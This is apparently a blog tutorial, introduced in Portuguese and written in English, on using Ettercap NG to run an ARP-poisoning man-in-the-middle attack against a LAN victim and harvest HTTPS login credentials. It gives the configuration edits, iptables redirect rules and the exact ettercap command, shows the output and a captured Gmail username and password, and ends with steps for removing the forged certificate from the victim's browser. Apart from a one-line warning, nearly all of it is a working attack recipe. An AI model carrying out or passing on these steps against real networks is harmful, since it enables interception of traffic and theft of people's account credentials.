em Security

Usando Ettercap NG para capturar conexões SSL

O Ettercap é uma ferramenta de monitoramento ( sniffer ) no qual pode ser usado como estudo de aplicações, análise forense entre outros fins.
O intuito deste artigo é explicar como configurar o Ettercap para tirar melhor proveito.
Artigo em inglês

*** WARNING : This HOWTO is for educational only. Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***

Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the change as the following :

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Uncomment the following :

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

Step 2 :

Victim’s machine is at 192.168.1.100 while the router is at 192.168.1.1. Attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The outcome of the display is as the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector “dns” not supported (etter.conf line 72)
Listening on eth0… (Ethernet)

eth0 -> 08:00:27:FF:95:DB 192.168.1.115 255.255.255.0

Privileges dropped to UID 0 GID 0…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)…

* |=================================================>| 100.00 %

2 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help

Step 3 :

At the victim’s machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail.

When the victim login to the GMail, his/her username and password will be logged on the Attacker’s machine. The display will be similar to the following :

HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

You will find that USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate on Firefox at victim’s machine : “Edit” — “Perference” — “View Certificate List” — “Server”. You will find something like the following. You just delete them all.